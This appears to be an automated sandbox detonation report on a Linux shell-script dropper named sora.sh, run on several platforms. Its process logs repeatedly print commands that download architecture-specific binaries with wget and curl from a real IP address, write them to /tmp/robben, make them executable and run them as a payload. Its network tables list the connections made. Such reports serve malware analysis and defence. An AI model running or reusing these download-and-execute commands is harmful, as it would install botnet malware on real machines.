[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-11 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-11 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-11 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-11 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:20

Platform

debian12-mipsel-20240221-en

Max time kernel

48s

Max time network

53s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-logrotate.service-vLtvov systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-1 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-1 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-1 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-1 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:31

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

152s

Max time network

571s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 8.8.8.8:53 canonical-lgw01.cdn.snapcraftcontent.com udp
US 8.8.8.8:53 canonical-lgw01.cdn.snapcraftcontent.com udp
GB 185.125.190.26:443 canonical-lgw01.cdn.snapcraftcontent.com tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
US 1.1.1.1:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 1.1.1.1:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 91.189.91.43:443 canonical-bos01.cdn.snapcraftcontent.com tcp
US 1.1.1.1:53 api.snapcraft.io udp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 1.1.1.1:53 canonical-lgw01.cdn.snapcraftcontent.com udp
US 1.1.1.1:53 canonical-lgw01.cdn.snapcraftcontent.com udp
GB 185.125.190.27:443 canonical-lgw01.cdn.snapcraftcontent.com tcp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 1.1.1.1:53 _http._tcp.se.archive.ubuntu.com udp
US 1.1.1.1:53 _http._tcp.security.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 se.archive.ubuntu.com udp
US 1.1.1.1:53 se.archive.ubuntu.com udp
GB 185.125.190.83:80 security.ubuntu.com tcp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.59:443 api.snapcraft.io tcp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:22

Platform

debian9-armhf-20240611-en

Max time kernel

98s

Max time network

126s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-VTggM8]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

